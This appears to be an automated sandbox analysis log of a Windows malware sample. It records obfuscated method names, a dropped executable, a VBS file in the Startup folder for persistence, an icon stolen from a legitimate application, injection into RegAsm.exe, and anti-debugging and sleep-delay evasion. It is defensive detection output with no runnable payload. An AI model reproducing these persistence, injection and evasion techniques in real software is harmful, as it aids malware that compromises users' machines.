      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJump to dropped file

      Boot Survival

      barindex
      Drops VBS files to the startup folder
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbsJump to dropped file
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbsJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbsJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Icon mismatch, binary includes an icon from a different legit application in order to fool users
      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (4).png
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4368Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe TID: 5928Thread sleep time: -31025s >= -30000sJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6332Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 6505Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2973Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1009Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002651DA FindFirstFileExA,0_2_002651DA
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB51DA FindFirstFileExA,7_2_00AB51DA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeThread delayed: delay time: 31025Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: RegAsm.exe, 00000003.00000002.510037415.0000000001195000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/&3OH,
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00262598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00262598
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00267394 GetProcessHeap,0_2_00267394
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00263E41 mov eax, dword ptr fs:[00000030h]0_2_00263E41
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D04405 mov eax, dword ptr fs:[00000030h]0_2_00D04405
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D04135 mov edx, dword ptr fs:[00000030h]0_2_00D04135
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D043A5 mov eax, dword ptr fs:[00000030h]0_2_00D043A5
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB3E41 mov eax, dword ptr fs:[00000030h]7_2_00AB3E41
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D4135 mov edx, dword ptr fs:[00000030h]7_2_010D4135
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D4405 mov eax, dword ptr fs:[00000030h]7_2_010D4405
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D43A5 mov eax, dword ptr fs:[00000030h]7_2_010D43A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002626FA SetUnhandledExceptionFilter,0_2_002626FA
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00262598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00262598
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00264D99 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00264D99
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002629CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002629CC
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB26FA SetUnhandledExceptionFilter,7_2_00AB26FA
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB4D99 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00AB4D99
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB2598 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00AB2598
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB29CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00AB29CC

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
      Writes to foreign memory regions
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D72008Jump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F1E008Jump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJump to behavior
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerh
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.514013008.0000000006D3E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerL
      Source: RegAsm.exe, 00000003.00000002.510052393.00000000012AD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager h
      Source: RegAsm.exe, 00000003.00000002.510432918.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.511284047.00000000031D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
      Source: RegAsm.exe, 00000003.00000002.513862048.00000000062BD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: 'lProgram Manager
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
